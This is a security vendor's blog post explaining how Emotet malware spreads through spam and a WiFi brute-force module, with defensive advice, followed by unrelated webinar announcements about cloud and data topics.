A Deep Dive Look at EMOTET Malware

By Edward Serafin III, C|EH, Security Architect

Emotet: What is it?

Emotet is a type of malware that originated in 2014. It was initially a banking trojan that stole information from people, such as credit card details. It was delivered via social engineering techniques like malicious spam. As years went by, it became more dangerous and destructive. It has now evolved into what the U.S. Department of Homeland Security calls “…the most costly and destructive malware affecting state, local, tribal, and territorial governments, and the private and public sectors” 

Emotet was inactive for some time until earlier this year. It has transformed into modular malware, making it stealthy and more dangerous. One of its stealth-like mechanisms is its polymorphic abilities. The code changes at least three times a day. Additionally, Emotet can detect when it is in a virtual machine and sandbox environment, allowing it to remain dormant and undetectable. To make matters worse, it has transformed into a worm, allowing it to spread and infect many devices instead of just one.

It was recently discovered that Emotet now has a WiFi spreader. This is a completely new attack vector that poses a danger to companies near an infected one. If someone near you is infected with Emotet, and your WFi password is not strong, then there is a likely chance you too will be infected by this malware.

How does it work?

The main attack vector remains the same through malicious spam. The infection can arrive through a malicious script, macro-enabled document files, or malicious link. Emotet emails are disguised to look like a real email. Once the infection is on the computer, it will send itself to the entire contact list found on the device. This makes the email look more legitimate, as it is coming from a real source. 

Once the document is opened, a batch script is invoked, followed by a PowerShell. A number of URLS for hijacked websites are then cycled to download the Emotet payload. The payload executes and then persists itself. It then begins spreading by brute-forcing its way onto other systems on the network.

The new attack vector recently discovered works like this:
1. Emotet infects a host

2. WiFi Spreader module is downloaded and then run

3. Nearby devices with reachable WiFi networks are discovered

4. A brute-force attack is conducted on each network

5.  Once in, another brute-force attack is conducted to discover the usernames and passwords of servers and computers connected to the WiFi network

6. The Emotet infection cycle repeats

How can I defend against EMOTET?

Awareness – Awareness is a key component in preventing Emotet from spreading. Informing the employees of your company to avoid spam emails and to not click on any downloads is important. If you do not know the sender, avoid the email. If you did not expect a message with an attachment, do not open it. A security awareness training program is recommended to ensure employees know how to detect malicious emails.

Incident Response – Having a robust incident response plan in case of a device infected by Emotet is important. Below are 9 steps the plan should incorporate:

1. Detection

2. Analysis/Classification – Analyze what was compromised and classify accordingly

3. Containment – Restrict access to the affected system(s). Change passwords if necessary.

4. Pre-recovery – Backup affected systems

5. Communication – Tell the people who need to know 

6. Containment(long-term) – If system(s) must return to production immediately; scan for malware, install security patches, remove any identified invalid accounts/ackdoors, and validate with a vulnerability scanner

7. Eradication – Rebuild the system(s) from backups and make sure all malware is gone.

8. Recovery – Restore the affected system(s) to their original state and put them back into production

9. Lessons Learned – Document what was discovered about the incident

A good Security Operations Center (SOC) is needed to implement such an incident response plan. If your company does not have one, a SOC-as-a-service is a good option to look into as it will keep your business safe and secure.

Artificial Intelligence – Traditional security tools are no match for Emotet, but artificial intelligence and machine learning solve this problem. Some cybersecurity software uses unsupervised machine learning algorithms to detect cyber-threats that have already infiltrated the network. It learns the individual pattern of life of every user device, and network that it protects. It can determine what is considered normal and anomalous behavior. It is able to detect malicious email spamming and brute-force attacks with ease. 

Having an intrusion prevention system that utilizes machine learning and artificial intelligence is perhaps the best security measure, besides awareness, in combating Emotet. 

Secure WiFi – With this new attack vector, companies should complexify their WiFi passwords.

Create backups –
This is a simple and effective way to decrease the damages that Emotet can cause. If your company is not conducting regular backups, investing in a backup solutions business is ideal. This ensures data is secure, always available, and accurate.

Patch and Secure Machines – Making sure machines are secured and up to date is important in preventing Emotet from infecting the device. An out-of-date machine has more vulnerabilities which increases risk of infection.

Network Segmentation – This is an uncommon practice, but with the recent blow-up in devastating malware, it is now becoming more used. Splitting a network into subnetworks exponentially increases network security and performance. If one network is infected, only those devices on the network will remain infected. All devices on the other network will remain safe, secure, and be able to continue their daily tasks.

What Do I Do If My Organization is Infected?

Even with all these ways to defend against Emotet, it is still possible for it to get through. That is the unfortunate nature of cyber security. Nothing is 100% protected. All it takes is one click from an employee for Emotet to be downloaded and infect the computer. One click to potentially cost your company millions.  

If a device is infected, it is important to assess how much damage has been done. With this type of malware, you should assume that if one device is infected, so are others. The following are some steps to follow if possible:

  1. Shut down the entire network
  2. Remove the malware.
  3. Secure the device
  4. Restore the network


Emotet is a deadly, polymorphic virus that is becoming deadlier by the month. The more people know about it, the easier it will be to prevent it. Nothing is ever completely secure, but the best we as humans can do is try to minimize loss by making things as secure as possible. The cyber-security field changes on a daily basis, with new malware being introduced all the time. With the emerging AI technology, the future is looking bright for cyber-security. Emotet may be running rampant now, but as long as you follow the ways to defend against it, you and your company will be safe.  

Concerned about your vulnerabilities and want to learn more about how to safeguard your organization? Contact us.

Hello New Data: The Change in Consumer Behavior Insights

Join the Data & Analytics team for a conversation on the transformation of data as it affects consumer behavior.

“COVID-19 has deeply impacted the way we work, learn, teach, parent, play, connect … the way we live.” Read Juan’s latest blog, Goodbye Data, Hello New Data: Actionable Insights in Times of Uncertainty. 

Interested in diving deeper? Stream the recording of Analytics Embracing a World in Crisis: Integrating Certainty and Uncertainty, a conversation between Juan Nunez and Lisa Cavanagh as they explore Big Data, resilience, and antifragility.

Hybrid Technology Embracing a World in Crisis: Evolving from Optimized to Resilient to Antifragile Business Operations

The dependence of businesses on technology over the past three decades resulted in infrastructure teams building well-defined, optimized systems to ensure their availability to support business needs and business continuity.

All this optimization created rigidity in these systems, resulting in the inability to keep up with the increasing rate of advances in technology and operational changes in business, while leaving them brittle and unable to sustain the shocks of events like our current crisis.

Cloud technologies have quickly become popular because they create flexible infrastructure capacity and capabilities, which are essential for infrastructure teams.  The organizations who have embraced these technologies have become more resilient, but that is no longer enough.  We must leverage these technologies to go beyond resilience and allow organizations to become antifragile and better able to withstand shocks and stress.

“The Chaos Monkey’s job is to randomly kill instances and services within our architecture. If we aren’t constantly testing our ability to succeed despite failure, then it isn’t likely to work when it matters most — in the event of an unexpected outage.” Jeff Atwood, Coding Horror


Thursday, June 4, 2020


1:00 PM EDT

Join Robert Claybrook and Lisa Cavanagh for an exploratory conversation on leveraging cloud technologies to create an antifragile technology landscape for your business.

Business Continuity on Public Cloud

 85% of companies have a hybrid cloud environment

 73% of large enterprises plan to use the public cloud for backup, archive and DR

Companies rank “data protection,” “IT visibility” and “rapid data growth” among their top storage challenges. How the organization visualizes, manages and protects data, has become just as important as how much capacity the organization provides for data.

Virtualized storage (implemented through software in storage systems or software-defined storage) can dramatically increase operational efficiency, reduce administrative costs, improve data security, and provide cloud-based backup and disaster-recovery capabilities. It also can add these capabilities to storage you own.

Stream this session as we address how organizations can link on-premises storage with public cloud storage while retaining flexibility without introducing new complexity or requiring significant new capital investment. 

As part of the presentation, there is a demonstration of a multi-cloud solution for business continuity using IBM Spectrum Virtualize for Public Cloud on AWS and IBM Storage Insights which allows companies to optimize storage infrastructure using a cloud-based storage management and support platform with predictive analytics.


Collaborate & Work in a Virtual Environment with Cloud Content Management from Box

As corporate America adjusts to operating virtually, organizations are now challenged with being productive within a virtual environment, and finding new ways to collaborate, communicate and adapt traditional business processes to virtual operations.

Join Micro Strategies and Box as they share the knowledge and insights you need to collaborate and be productive during the new normal. Hear how organizations like yours are using technology and business processes to streamline how their organization works.

Date: June 18, 2020

Time: 11:00 AM EDT